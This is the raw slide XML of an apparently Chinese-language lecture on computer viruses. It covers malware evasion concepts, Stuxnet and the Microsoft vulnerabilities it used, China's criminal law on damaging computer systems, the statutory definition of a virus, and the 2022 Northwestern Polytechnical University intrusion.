              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>多态性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t> – 更改恶意软件签名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>变形</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t> – 在执行时更改恶意软件代码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>混淆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t> – 混淆恶意活动</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>自加密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t> – 使用加密来隐藏恶意代码和数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>反虚拟机/沙盒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t> – 更改行为以逃避取证分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>防调试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t> – 在取证环境中切换策略以中断调试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加密漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t> – 更改参数和签名以逃避调查</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>行为更改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t> – 在执行之前等待使用活动</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205605"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震网病毒（Stuxnet病毒）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6186170" y="985520"/>
            <a:ext cx="5691505" cy="2306955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>是一个席卷全球</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>工业界</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>的病毒</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>是一种典型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>蠕虫病毒</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>世界上首个网络“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>超级破坏性武器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>为攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>伊朗核设施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>而生，近60%的感染发生在伊朗</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="649605"/>
            <a:ext cx="5956935" cy="6109335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6186170" y="3292475"/>
            <a:ext cx="5502910" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用微软的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MS10-046漏洞（Lnk文件漏洞）、MS10-061（打印服务漏洞）、MS08-067等多种漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，实现联网主机之间的传播</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击西门子的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SCADA软件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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="矩形 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2831637" y="138202"/>
              <a:ext cx="1878330" cy="501650"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2665" b="1" kern="10" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>网络安全法</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2053590" y="1218565"/>
            <a:ext cx="9522460" cy="4154170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第二百八十六条【破坏计算机信息系统罪】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰，造成计算机信息系统不能正常运行，后果严重的，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>处五年以下有期徒刑或者拘役;后果特别严重的，处五年以上有期徒刑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>违反国家规定，对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作，后果严重的，依照前款的规定处罚。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>故意制作、传播计算机病毒等破坏性程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>，影响计算机系统正常运行，后果严重的，依照第一款的规定处罚</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9420" y="2610485"/>
            <a:ext cx="10482580" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>计算机病毒（感染式病毒（Virus））</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" b="1">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21205" y="1113155"/>
            <a:ext cx="9461500" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>计算机病毒（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Computer Virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>）在《中华人民共和国计算机信息系统安全保护条例》中被明确定义，病毒指“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>编制者在计算机程序中插入的破坏计算机功能或者破坏数据，影响计算机使用并且能够自我复制的一组计算机指令或者程序代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>”。</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737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计算机病毒定义和特性</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2021205" y="3019425"/>
            <a:ext cx="7683500" cy="3046095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>计算机病毒特性：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>繁殖性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>破坏性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>传染性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>潜伏性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>隐蔽性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可触发性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">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文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600075" y="307975"/>
            <a:ext cx="10920412" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>西北工业大学</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>遭美网络攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473075" y="1169035"/>
            <a:ext cx="9287510" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2022</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年9月5日，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>国家计算机病毒应急处理中心</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>360公司</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分别发布了关于西北工业大学遭受美国国家安全局网络攻击的调查报告，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>美国国家安全局(NSA)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>下属的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>特定入侵行动办公室(TAO)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>40余种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不同的专属网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击武器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，仅</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后门工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“狡诈异端犯”就有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
